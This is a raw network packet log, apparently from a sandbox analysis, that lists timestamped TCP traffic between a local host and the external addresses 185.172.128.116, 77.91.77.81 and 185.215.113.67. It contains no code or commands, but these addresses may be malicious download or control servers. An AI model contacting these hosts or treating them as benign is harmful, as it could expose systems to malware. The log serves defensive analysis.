Jun 24, 2024 00:10:21.832214117 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832225084 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832237005 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832248926 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832259893 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832271099 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832279921 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.832283020 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832293987 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832305908 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.832312107 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832334042 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.832334042 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.832431078 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832443953 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832477093 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.832477093 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.832526922 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832536936 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832547903 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832560062 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832571030 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832573891 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.832582951 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832607985 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.832639933 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.832685947 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832698107 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832709074 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832720041 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832731009 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832736969 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.832767963 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.832798958 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.832823038 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832834005 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832844973 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832854986 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832873106 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.832905054 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.832967997 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832979918 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.832990885 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833003044 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833019018 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833022118 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.833030939 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833043098 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833054066 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833065987 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833076954 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833086014 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.833086014 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.833089113 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833111048 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.833133936 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.833306074 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833317041 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833328009 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833334923 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833345890 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833365917 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.833396912 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.833465099 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833476067 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833487034 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833497047 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.833518982 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.833551884 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.837537050 CEST	49707	40960	192.168.2.5	185.215.113.67
Jun 24, 2024 00:10:21.839812040 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.839833021 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.839843035 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.839865923 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.839890957 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.839893103 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.839894056 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.839903116 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.839957952 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.839958906 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.839970112 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840002060 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.840008974 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840020895 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840034008 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.840061903 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.840142012 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840152025 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840162039 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840173006 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840183020 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840193033 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.840194941 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840250969 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.840257883 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840306044 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.840313911 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840325117 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840334892 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840346098 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840363979 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.840396881 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.840462923 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840472937 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840488911 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840498924 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840511084 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840522051 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840523005 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.840553999 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.840584040 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.840606928 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840617895 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840658903 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.840692997 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840704918 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840714931 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840723991 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.840751886 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.840781927 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.841759920 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.841804981 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.841811895 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.841815948 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.841850042 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.842516899 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842528105 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842539072 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842550039 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842566967 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.842575073 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842590094 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842601061 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842606068 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.842612028 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842622042 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842633009 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842644930 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842653990 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842659950 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.842665911 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842675924 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842685938 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842688084 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.842696905 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842708111 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842716932 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842724085 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.842729092 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842740059 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842751980 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.842755079 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842773914 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842780113 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.842784882 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842799902 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.842807055 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842817068 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842828989 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842839003 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.842840910 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842850924 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842881918 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.842885017 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842895985 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842905998 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842906952 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.842916012 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.842935085 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.842983007 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843030930 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843041897 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843053102 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843065023 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843075037 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843075991 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843092918 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843133926 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843173027 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843184948 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843198061 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843210936 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843221903 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843223095 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843254089 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843287945 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843287945 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843300104 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843326092 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843326092 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843348980 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843372107 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843400955 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843413115 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843424082 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843434095 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843446016 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843492985 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843533039 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843542099 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843550920 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843561888 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843571901 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843575954 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843584061 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843628883 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843650103 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843689919 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843699932 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843734980 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843746901 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843756914 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843766928 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843784094 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843802929 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843833923 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843844891 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843856096 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843866110 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843877077 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.843893051 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.843935966 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.844012022 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844022036 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844039917 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844049931 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.844050884 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844093084 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.844118118 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844130039 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844167948 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.844254017 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844264984 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844274998 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844286919 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844299078 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844297886 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.844310045 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844317913 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.844321966 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844367981 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.844451904 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844463110 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844474077 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844489098 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844496965 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.844541073 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.844664097 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844675064 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844686031 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844697952 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844708920 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844710112 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.844719887 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844732046 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844739914 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.844743967 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844754934 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844760895 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.844765902 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844784021 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.844811916 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.844849110 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844890118 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.844893932 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.844934940 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.880235910 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.880265951 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.880275965 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.880280972 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.880285978 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.880290985 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.880296946 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.880300999 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.880357027 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.880393028 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.888410091 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.888501883 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.888545990 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.888560057 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.888576984 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.888587952 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.888597965 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.888601065 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.888608932 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.888638973 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.888648987 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.888653994 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.888662100 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.888672113 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.888676882 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.888683081 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.888705969 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.888712883 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.888716936 CEST	80	49725	77.91.77.81	192.168.2.5
Jun 24, 2024 00:10:21.888756990 CEST	49725	80	192.168.2.5	77.91.77.81
Jun 24, 2024 00:10:21.910317898 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910331011 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910358906 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910371065 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910382032 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910394907 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.910459995 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.910496950 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910509109 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910520077 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910531044 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910542965 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.910543919 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910587072 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.910619974 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.910650015 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910665989 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910676956 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910689116 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910707951 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.910738945 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.910813093 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910823107 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910832882 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910845041 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910856962 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910861015 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.910867929 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910878897 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.910891056 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.910924911 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.918965101 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919028997 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919034004 CEST	49726	80	192.168.2.5	185.172.128.116
Jun 24, 2024 00:10:21.919039011 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919058084 CEST	80	49726	185.172.128.116	192.168.2.5
Jun 24, 2024 00:10:21.919075966 CEST	80	49726	185.172.128.116	192.168.2.5
